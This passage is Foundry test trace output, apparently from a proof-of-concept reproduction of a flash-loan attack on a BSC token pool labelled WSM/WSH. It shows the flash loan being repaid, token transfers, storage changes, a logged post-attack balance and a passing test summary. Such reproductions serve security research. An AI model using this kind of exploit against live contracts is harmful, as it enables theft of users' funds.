    │   │   │   │   │   @ 2: 0x00000000000000000000000000000000000490fa9aca367f2e6a1bd1e4091c02 → 0x00000000000000000000000000000000000559ce41476ae95ba969225f537880
    │   │   │   │   │   @ 0xd8b1c104cb52ae490d64cc8c61380dd365a56733c2a4cf6d9359c06527d2e0cf: 0x00000000000000000000000000000002fdffcc740faf9e3b0e05df455896c63f → 0x0000000000000000000000000000016ce67d3033b5173427988ef578b1231475
    │   │   │   │   │   @ 0xd8b1c104cb52ae490d64cc8c61380dd365a56733c2a4cf6d9359c06527d2e0d0: 0x00000000000000000000000000000000000490fa9aca367f2e6a1bd1e4091c02 → 0x000000000000000000000000000000000000c5aa20a060bbf2462ccfd6a25f5f
    │   │   │   │   └─ ← [Return] -4797438179912631607253979 [-4.797e24], 34463515870414125700 [3.446e19]
    │   │   │   └─ ← [Return] 4797438179912631607253979 [4.797e24]
    │   │   ├─ [0] console::log("7. repay flashloan for bnb_wsh_10000 pool") [staticcall]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3843] 0x62694D43Ccb9B64e76e38385d15e325c7712A735::transfer(0x84F3cA9B7a1579fF74059Bd0e8929424D3FA330E, 5050000000000000000000000 [5.05e24])
    │   │   │   ├─ emit Transfer(from: WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x84F3cA9B7a1579fF74059Bd0e8929424D3FA330E, value: 5050000000000000000000000 [5.05e24])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000064277a54f40b5b2065bdb → 0x00000000000000000000000000000000000000000002151698e14f6c11c65bdb
    │   │   │   │   @ 0x0c133ccc9899d10bde0278674e66efe58d11376f728b6916551edfcd01aa314a: 0x00000000000000000000000000000000000000000000103d5e8b6b872e2c88a4 → 0x000000000000000000000000000000000000000000043d9e6af95cd0ce6c88a4
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0: 0x000000000100010000fc6d47000000000000000000008a0eb710da9e97fbe943 → 0x000100000100010000fc6d47000000000000000000008a0eb710da9e97fbe943
    │   │   │   @ 1: 2 → 1
    │   │   └─ ← [Stop]
    │   ├─ [626] 0x62694D43Ccb9B64e76e38385d15e325c7712A735::balanceOf(0x84F3cA9B7a1579fF74059Bd0e8929424D3FA330E) [staticcall]
    │   │   └─ ← [Return] 5126689927771500273502372 [5.126e24]
    │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x84F3cA9B7a1579fF74059Bd0e8929424D3FA330E) [staticcall]
    │   │   └─ ← [Return] 81756621717182567206 [8.175e19]
    │   ├─ emit Flash(param0: WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 5000000000000000000000000 [5e24], param3: 0, param4: 50000000000000000000000 [5e22], param5: 0)
    │   ├─  storage changes:
    │   │   @ 1: 0x000000000000000000000000000000084749a3f8edcd660f0bbc915ead6ab9c0 → 0x0000000000000000000000000000000ad588d891fcd43bfba201c57c71cec8f4
    │   └─ ← [Stop]
    ├─ [626] 0x62694D43Ccb9B64e76e38385d15e325c7712A735::balanceOf(WSM: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 2517438179912631607253979 [2.517e24]
    ├─ [0] console::log("8. after attack wsh token balance of this = ", 2517438179912631607253979 [2.517e24]) [staticcall]
    │   └─ ← [Stop]
    ├─  storage changes:
    │   @ 0: 0x000000000100010000fe503c00000000000000000104e287c69d8a701173018a → 0x000100000100010000fe503c00000000000000000104e287c69d8a701173018a
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.51s (69.25ms CPU time)

Ran 2 test suites in 5.74s (2.27s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
